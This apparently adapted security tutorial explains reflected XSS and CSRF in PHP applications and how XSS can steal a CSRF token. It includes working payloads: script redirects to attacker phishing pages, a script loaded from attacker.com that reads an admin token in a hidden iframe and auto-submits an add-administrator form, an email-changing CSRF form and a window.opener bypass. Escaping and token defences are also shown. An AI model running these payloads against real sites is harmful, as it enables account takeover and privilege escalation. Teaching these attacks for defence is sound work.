Research | Bypass CSRF Protection w/ XSS


In brief: the web application receives data from the client through a GET parameter and then displays it.

```php
if(isset($_GET['text']))
{
    $var = $_GET['text'];
    print $var;
}
// This code checks whether the 'text' variable is set in the GET request,
// stores its contents in a variable called $var, and prints it unchanged.
```
The request will look like this:

http://www.site.com/script.php?text=test

What happens if we make it like this?

http://www.site.com/script.php?text=<script>code_javascript</script>

Well, the JavaScript code will be executed!

💡 Most often this problem is found in the search box. Regardless of whether the data is sent using POST or GET, the return message will be something like: “You searched for ’test’ “

Cookie Grabber

Phishing Attacks

http://www.site.com/script.php?text=<script>document.location.href="http://www.site-attacker.com/phishing.html"</script>

Scam Page

```html
<iframe src="http://attacker.com/phishing_page_identical_copy_of_the_aplication_page.html" style="z-index: 0; position: absolute; top: 0; left: 0; height:100%; width:100%;"></iframe>
```

Making Pages Cooler!

```html
<script>document.images[4].src="http://rstcenter.com/up/director/RST.png"</script>
```

Using the htmlspecialchars function with PHP

```php
if(isset($_GET['text'])) {
    $var = $_GET['text'];
    print htmlentities($var, ENT_QUOTES);
    // Or: print htmlspecialchars($var, ENT_QUOTES);
}
```

If the input is of a specific datatype (int, float, ...):

- Typecast the value to the corresponding datatype using functions like intval(), floatval().
- Validate the variable against the corresponding datatype using is_numeric(), is_float(), etc.

```php
if (is_numeric($id) == True) {
    // <code>
}
```
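The escaping fix above, as an added example that is not code from the original article, written in Node.js rather than PHP: escapeHtml() plays the role of htmlspecialchars($var, ENT_QUOTES), the two render functions show the "You searched for" page before and after the fix, and parseArticleId() shows the typecast-and-validate rule for numeric input. The function names and the sample payload are constructed for this example.

```javascript
// Added example (not from the original article): context-aware output encoding for
// the "You searched for 'test'" pattern, plus strict validation for numeric ids.
// Node.js, no dependencies.

// Escape the five characters that matter in HTML text and attribute contexts.
// Same intent as PHP's htmlspecialchars($s, ENT_QUOTES): quotes are escaped too,
// so the value is safe inside a single- or double-quoted attribute as well.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Vulnerable rendering: the query is concatenated into the page unchanged,
// exactly like `print $var;` in the article.
function renderSearchUnsafe(query) {
  return `<p>You searched for '${query}'</p>`;
}

// Hardened rendering: every untrusted value passes through escapeHtml() first.
function renderSearchSafe(query) {
  return `<p>You searched for '${escapeHtml(query)}'</p>`;
}

// For identifiers that must be integers, validate and convert instead of echoing.
// Returns a non-negative integer, or null meaning "reject the request".
function parseArticleId(raw) {
  if (typeof raw !== 'string' || !/^[0-9]{1,9}$/.test(raw)) return null;
  return Number.parseInt(raw, 10);
}

// Constructed sample input shaped like the article's payload.
const samplePayload = '<script>alert(1)</script>';
console.log(renderSearchUnsafe(samplePayload)); // the <script> tag survives intact
console.log(renderSearchSafe(samplePayload));   // rendered as literal text
console.log(parseArticleId('123'), parseArticleId('123 OR 1=1')); // 123 null
```

The escaping is applied at output time, where the HTML context is known; validating the numeric id at input time is the complementary rule for values that are never meant to contain markup.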

What makes this vulnerability possible is the automation of an action, an action that is generally performed by the application's administrators. For this type of vulnerability the victims are authenticated users of the application, and CSRF lets the attacker automate some of the actions those users are allowed to perform.

The administration panel has a page where the administrator can delete an article just by clicking on a link:

http://www.site.com/admin/delete_articol?articol_id=123

The attacker can make a page on which he puts the following code:

```html
<iframe src="http://www.site.com/admin/delete_articol?articol_id=123" width="0" height="0"></iframe>
```

When the victim, in our case the administrator, visits this web page, his browser makes the request that deletes the article without him knowing.

A simple protection is to generate a random token at login and keep it in the session:

```php
if(isset($_POST['login'])){
    // Check login
    $_SESSION['token'] = Random();
}

function Random(){
    $chars = array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
                   'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
                   '0','1','2','3','4','5','6','7','8','9');
    shuffle($chars);
    $sir = substr(implode('', $chars), 0, 10);
    return $sir;
}
// The random string is generated by the Random() function, which creates an array
// of characters, shuffles them, and then combines them into a string of 10 characters,
// which is returned as the function's output.
// This token can then be used as an extra layer of security to prevent CSRF attacks.
// Note: shuffle() is not a cryptographically secure source of randomness; in PHP 7+
// random_bytes() is the appropriate primitive for tokens.
```
For example, when deleting an article, we add this token when we create the deletion link:

```php
print '<a href="admin.php?action=delete_articol&articol_id=' . $date['id'] . '&token=' . $_SESSION['token'] . '">Delete</a>';
```

Therefore, the link for the deletion will be something like this:

http://www.site.com/admin.php?action=delete_articol&articol_id=123&token=qdY4f6FTpO

To delete the article we need to verify that the token is the one in the session:

```php
if(isset($_GET['action']) && $_GET['action'] == 'delete_articol'){
    if(isset($_GET['token']) && $_SESSION['token'] == $_GET['token']){
        // delete_specified_article();
    }
    else print 'The token does not match, you may be a victim of CSRF';
}
```

💡 Other methods, safer but more “time consuming”, would be to ask for the user's or administrator's password for every important action, or to add a CAPTCHA image and verify the text entered by the user.

Let’s take an example: adding a new administrator, given the name of the user who will become an administrator. This happens in the folder /admin, which is protected against CSRF with the token.

/admin/admin.php?action=add_admin ( for example ):

```html
<form method="get" action="add_admin.php">
Name: <input type="text" name="name" value="" />
<br/>
<input type="hidden" name="token" value="<?php print $_SESSION['token']; ?>" />
<input type="submit" name="submit" value="add admin" /><br />
</form>
```

http://www.site.com/add_admin.php?name=Nytro&token=1htFI0iA9s&submit

When verifying, the token from the session will be the same as the one sent from the form, and Nytro will become an administrator.

```php
<?php
session_start();
if(isset($_GET['submit'])){
    if($_SESSION['token'] == $_GET['token']){
        // we_make_nytro_admin();
        print 'Nytro is now an admin.';
    }
    else print 'Token invalid _|_ :)';
}
?>
```


How to obtain the token?

We will consider the vulnerable application's main page (index.php), which contains the following code:

```php
<?php
if(isset($_GET['name'])) {
    print 'Hello, ' . $_GET['name'];
}
?>
```

To simplify things, we won’t write our JavaScript code directly in the request; instead we will write it in a .js file which we will consider uploaded at: http://www.attacker.com/script.js

In request we will use:

http://www.site_vulnerable.com/index.php?name=<script src="http://www.attacker.com/script.js"></script>

The attacker creates an iframe that opens the targeted website’s administration page, using the following code in script.js:

```javascript
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
```

Then he uses the obtained token to construct a link that sends the victim to the add_admin page with the attacker's chosen name. The read() function called when the iframe has loaded does this:

```javascript
function read() {
    var name = 'Nytro';
    var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.location.href = 'http://127.0.0.1/admin/add_admin.php?name=' + name + '&token=' + token + '&submit';
}
```

The attacker can hide the injected page from the victim by loading it inside an iframe on his own site:

```html
<iframe src='http://site_victim.com/index.php?name=<script src="http://127.0.0.1/script.js"></script>' width="300" height="300"></iframe>
```
- XSS can be used to obtain administrator rights on a vBulletin or phpBB forum.
- The data may have to be sent twice using POST, which can be done using an iframe within an iframe.
- It is possible to read a token from a page protected by CSRF and create a form with that token.

The following script loads the CSRF-protected page in an iframe, reads the token from it, builds a form carrying that token and the wanted name, and presses the submit button:

```javascript
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
function read() {
    var name = 'Nytro';
    var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.writeln('<form width="0" height="0" method="post" action="/admin/add_admin.php">');
    document.writeln('<input type="text" name="name" value="' + name + '" /><br />');
    document.writeln('<input type="hidden" name="token" value="' + token + '" />');
    document.writeln('<input type="submit" name="submit" value="Add_admin" /><br />');
    document.writeln('</form>');
    document.forms[0].submit.click();
}
```

This can be done more easily by using the contentDocument property in Mozilla browsers: the script writes the wanted name straight into the form inside the iframe and clicks its submit button. However, this might not work in all browsers.

```javascript
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
function read() {
    var name = 'Nytro';
    document.getElementById("iframe").contentDocument.forms[0].name.value = name;
    document.getElementById("iframe").contentDocument.forms[0].submit.click();
}
```

Look at this request:

```http
POST /home/accountsettings HTTP/1.1
Host: websecgeeks.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Referer: http://websecgeeks.com/
Connection: keep-alive
Content-Length: 57

newemail=attacker@something.com&Submit=S
```
We can say that this request might be vulnerable to CSRF, as no random token is present. Let’s try to make an exploit:

```html
<html>
<body>
<form action="http://websecgeeks.com/home/accountsettings" method="POST">
<input type="hidden" name="newemail" value="attacker@attacker.com" />
<input type="hidden" name="Submit" value="Save" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
```
However, when executing the page in an authenticated session, the application logged the user out. The application was validating the Referer value; the researcher tried manually adding a valid value, but the application still logged out.

The researcher found the JavaScript code that was responsible for this protection:

```javascript
if(window.opener == null){
    top.location.href="/homedirectory/logoutuser";
}
```

This code checks the value of the window.opener property and, if it is null, the application logs the user out and terminates the session.

According to the description of window.opener: when a window is opened from another window, it maintains a reference to that first window as window.opener. If the current window has no opener, this property returns null. The Windows Phone browser does not support window.opener. It is also not supported in IE if the opener is in a different security zone.

So to successfully perform a CSRF attack on this application, the attacker must set the window.opener value to a non-null value.

Let’s create two pages, xss.php and csrf3.html, hosted on localhost. The xss.php page contained an unfiltered parameter called “zip” with a link to the csrf3.html page. The csrf3.html page contained a form with hidden fields for automatically submitting values when opened.

The final URL sent to the victim was:

http://127.0.0.1/xss.php?zip=<a href="http://127.0.0.1/csrf3.html">Link For Target Application</a>

After clicking the link, the attacker was able to open a new page in a new tab without getting logged out, bypassing the CSRF protection.

“Client-side security is not foolproof, so it is important to properly implement solutions for preventing web application attacks”

References: ExploitDB paper
